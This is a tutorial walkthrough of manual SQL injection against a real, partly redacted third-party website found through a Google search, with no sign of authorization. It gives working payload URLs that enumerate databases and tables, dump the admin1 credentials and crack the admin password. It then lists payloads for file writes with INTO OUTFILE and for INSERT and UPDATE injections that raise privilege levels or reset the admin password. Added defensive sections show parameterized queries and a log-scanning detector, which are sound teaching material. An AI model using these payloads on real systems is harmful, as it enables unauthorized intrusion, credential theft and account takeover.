Recently I have been studying manual SQL injection and picked a website to practise on. The first task is to find a SQL injection point; I searched Google for inurl:php?id= and picked a result at random.
The link http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228 turned out to have a SQL injection point.
Step one is the injection test. The easiest way is to append and 1=1 and then and 1=2 to the link: if the page displays normally with and 1=1 but not with and 1=2, the link has an injection point. The principle is that the page's query is roughly
SELECT * FROM table where id=1
and the test turns it into
SELECT * FROM table where id=1 and 1=2
which returns no row, so the page changes.
Step two: after finding the injection point, guess the number of columns in the current query.
http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 6
http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 7
order by 6 displays correctly while order by 7 does not, so the query has 6 columns.
Step three: find which columns are echoed on the page.
http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,4,5,6--
The numbers that appear on the page mark the displayed positions; here columns 2 and 4 are displayed.
Step four: retrieve the basic information about the database.
http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,concat(user(),0x20,database(),0x20,version()),5,6--
Result: user people@localhost, database name people, version 5.0.20a-log.
List all databases:
http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+table_schema),5,6+from+information_schema.columns--
Database names returned: information_schema, people, test.
The INFORMATION_SCHEMA database was introduced in MySQL 5.0. It is a virtual database that does not exist physically; it works like a data dictionary, exposing database metadata (database and table names, column types, access privileges and so on) as ordinary tables. It holds the server's basic database information, changes as the server changes, and is the main source to consult when inspecting the server or making system decisions.
On MySQL 5.0 and above we therefore use INFORMATION_SCHEMA to obtain information about the other databases. The group_concat() function joins multiple rows into one string so they fit in a single displayed column; the distinct keyword removes repeated values.
Step five: list all table names in the current database:
http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+table_name),5,6+from+information_schema.tables+where+table_schema=database()--
admin1, answer, check, class, news, system, zhaoping
Since the page is news.php, its content must come from the news table; the table of interest is admin1.
Step six: list the columns of admin1, then dump the user information and log in to the back end.
The hex encoding of the string admin1 is 0x61646d696e31.
List all columns:
http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+column_name),5,6+from+information_schema.columns+where+table_name=0x61646d696e31--
Columns: id, admin, password, rank
Then dump the values of admin and password:
http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+id,0x2b,admin,0x2b,password,0x2b,rank),5,6+from+admin1--
The admin password's MD5 hash decrypts to 123456. Done.
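As an added illustration (my own code, not part of the original write-up), here is the query pattern behind a page like news.php?id= next to its parameterized form, using Python's sqlite3 in place of MySQL with a constructed two-table schema; the payloads are the ones from steps one and four above, and step four's concat() becomes SQLite's || operator.

```python
import sqlite3

# Constructed stand-in for the site's database: a six-column news table
# (the count the ORDER BY probe found) and an admin1 table with the
# columns the walkthrough lists. sqlite3 replaces MySQL here.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, cat TEXT, author TEXT,
                          title TEXT, body TEXT, created TEXT);
        CREATE TABLE admin1(id INTEGER, admin TEXT, password TEXT, rank INTEGER);
        INSERT INTO news VALUES (228, 'campus', 'editor', 'Open day', '...', '2024-01-01');
        INSERT INTO admin1 VALUES (1, 'admin', 'HASH_PLACEHOLDER', 0);
    """)
    return db

def news_vulnerable(db, raw_id):
    # The pattern behind news.php?id=: the parameter is spliced into the SQL
    # text, so it can change the statement's structure, not just its value.
    return db.execute("SELECT * FROM news WHERE id=" + raw_id).fetchall()

def news_parameterized(db, raw_id):
    # Hardened form: validate the type, then bind the value as a parameter.
    # The driver never lets a bound value be parsed as SQL.
    try:
        num = int(raw_id)
    except ValueError:
        return []
    return db.execute("SELECT * FROM news WHERE id=?", (num,)).fetchall()

# Step-four shape: blank the real row with "and 1=2", then UNION in a
# six-column row whose 4th (echoed) column carries another table's data.
PAYLOAD = "228 and 1=2 union select 1,2,3,admin||' '||password,5,6 from admin1"

def demo():
    db = build_db()
    return {
        "probe_true": len(news_vulnerable(db, "228 and 1=1")),   # 1: page looks normal
        "probe_false": len(news_vulnerable(db, "228 and 1=2")),  # 0: page breaks
        "leak": news_vulnerable(db, PAYLOAD)[0][3],               # admin data in column 4
        "safe": news_parameterized(db, PAYLOAD),                  # []: rejected
        "normal": news_parameterized(db, "228")[0][3],            # 'Open day'
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```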
Basic queries:
http://localhost/injection/user.php?username=angel' and LENGTH(password)='6
http://localhost/injection/user.php?username=angel' and left(password,1)='m
UNION statements:
http://localhost/injection/show.php?id=1' union select 1,username,password from user/*
http://localhost/injection/show.php?id=' union select 1,username,password from user/*
Exporting to a file:
http://localhost/injection/user.php?username=angel' into outfile 'c:/file.txt
http://localhost/injection/user.php?username=' or 1=1 into outfile 'C:/file.txt
http://localhost/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
Constructed homepage value: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');
UPDATE statement:
First understand this SQL:
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
If the values are modified as follows, the injection succeeds.
1: Modify the homepage value to
http://4ngel.net', userlevel='3
The SQL statement then becomes
UPDATE user SET password='MD5(mypass)', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
(userlevel is the user's privilege level.)
2: Modify the password value to
mypass)' WHERE username='admin' #
The SQL statement then becomes
UPDATE user SET password='MD5(mypass)' WHERE username='admin' #)', homepage='$homepage' WHERE id='$id'
3: Modify the id value to
' or username='admin'
The SQL statement then becomes
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' or username='admin'
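The probes in the walkthrough and the query forms above all leave recognizable traces in web-server access logs. This added example (my own, not from the original page) scans constructed common-log-format lines for those signatures after URL-decoding the request; the rule list and the log lines are assumptions built from the URLs shown on this page.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the request shapes shown on this page. Matching is
# done on the URL-decoded, lower-cased request path so that "+", "%20" and
# case changes do not hide the keywords.
RULES = {
    "tautology":   r"\b(and|or)\s+\d+\s*=\s*\d+\b",
    "order_probe": r"\border\s+by\s+\d+\b",
    "union":       r"\bunion\s+(all\s+)?select\b",
    "schema":      r"\binformation_schema\b",
    "outfile":     r"\binto\s+outfile\b",
    "concat":      r"\b(group_)?concat\s*\(",
    "hexlit":      r"\b0x[0-9a-f]{6,}\b",
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')

def scan_request(path):
    # Return the names of all rules that match one decoded request path.
    decoded = unquote_plus(path).lower()
    return [name for name, pat in RULES.items() if re.search(pat, decoded)]

def scan_log(lines):
    # Return (line number, raw path, matched rules) for every flagged line.
    hits = []
    for num, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        matched = scan_request(m.group(1))
        if matched:
            hits.append((num, m.group(1), matched))
    return hits

# Constructed access-log sample (common log format); the paths follow the
# page's probes, with one benign look-alike on line 5.
LOG = """\
10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /public/dongtai/news.php?id=228 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Mar/2024:10:00:09 +0000] "GET /public/dongtai/news.php?id=228+and+1=2 HTTP/1.1" 200 1020
10.0.0.5 - - [01/Mar/2024:10:00:15 +0000] "GET /public/dongtai/news.php?id=228+order+by+7 HTTP/1.1" 500 310
10.0.0.5 - - [01/Mar/2024:10:00:31 +0000] "GET /public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+table_name),5,6+from+information_schema.tables-- HTTP/1.1" 200 1900
10.0.0.9 - - [01/Mar/2024:10:01:02 +0000] "GET /search.php?q=student+union+order+form HTTP/1.1" 200 4100
10.0.0.5 - - [01/Mar/2024:10:02:40 +0000] "GET /injection/user.php?username=angel'+into+outfile+'c:/file.txt HTTP/1.1" 200 220
"""

if __name__ == "__main__":
    for num, path, rules in scan_log(LOG.splitlines()):
        print(f"line {num}: {', '.join(rules)}  {path}")
```

A benign "student union order form" search on line 5 is not flagged because the rules require the full keyword sequences rather than single words.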
Common MySQL built-in functions:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
VERSION()
SUBSTRING()
MID()
CHAR()
LOAD_FILE()
In summary, injection is the simplest and most commonly made mistake: for beginners the cause is usually input that is not filtered at all, while at a more advanced level it may be a server configuration or application logic problem.